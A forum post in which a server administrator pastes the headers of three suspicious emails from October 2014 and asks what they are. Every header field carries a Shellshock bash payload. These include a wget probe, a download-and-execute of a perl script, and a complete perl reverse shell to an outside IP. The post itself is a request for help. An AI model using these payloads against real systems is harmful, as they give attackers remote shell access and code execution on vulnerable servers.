Hi,
today i got some e-mails from my server
Dont know what this can be,
i searched the whole Server but nothing found.
this are te messages in the Mails:
Mail 1:
Mail 2:
Mail 3:
Some one any ideas?
best regards
Frank
today i got some e-mails from my server
Dont know what this can be,
i searched the whole Server but nothing found.
this are te messages in the Mails:
Mail 1:
Code:
Delivered-To: [email protected]
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
by freaky-media.de (Postfix) with ESMTP id D02C4621410
for <root>; Fri, 24 Oct 2014 11:25:36 +0200 (CAT)
To: () { :; }; wget 185.10.58.181/VULNERABLE;
References: () { :; }; wget 185.10.58.181/VULNERABLE;
Cc: () { :; }; wget 185.10.58.181/VULNERABLE;
From: () { :; }; wget 185.10.58.181/VULNERABLE;
Subject: () { :; }; wget 185.10.58.181/VULNERABLE;
Date: () { :; }; wget 185.10.58.181/VULNERABLE;
Message-ID: () { :; }; wget 185.10.58.181/VULNERABLE;
Comments: () { :; }; wget 185.10.58.181/VULNERABLE;
Keywords: () { :; }; wget 185.10.58.181/VULNERABLE;
Resent-Date: () { :; }; wget 185.10.58.181/VULNERABLE;
Resent-From: () { :; }; wget 185.10.58.181/VULNERABLE;
Mail 2:
Code:
Return-Path: <[email protected]>
X-Original-To: root@localhost
Delivered-To: [email protected]
Received: by freaky-media.de (Postfix)
id 73690621464; Fri, 24 Oct 2014 11:59:34 +0200 (CAT)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
by freaky-media.de (Postfix) with SMTP id 0A054621410
for <root@localhost>; Fri, 24 Oct 2014 11:59:33 +0200 (CAT)
To: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
References: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Cc: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
From: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Subject: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Date: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Message-ID: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Comments: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Keywords: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Resent-Date: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Resent-From: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Mail 3:
Code:
Return-Path: <[email protected]>
X-Original-To: root@localhost
Delivered-To: [email protected]
Received: by freaky-media.de (Postfix)
id 06940621468; Fri, 24 Oct 2014 12:36:43 +0200 (CAT)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
by freaky-media.de (Postfix) with SMTP id 806DD621467
for <root@localhost>; Fri, 24 Oct 2014 12:36:42 +0200 (CAT)
To: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
References: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Cc: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
From: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Subject: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Date: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Message-ID: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Comments: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Keywords: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Resent-Date: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Resent-From: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Some one any ideas?
best regards
Frank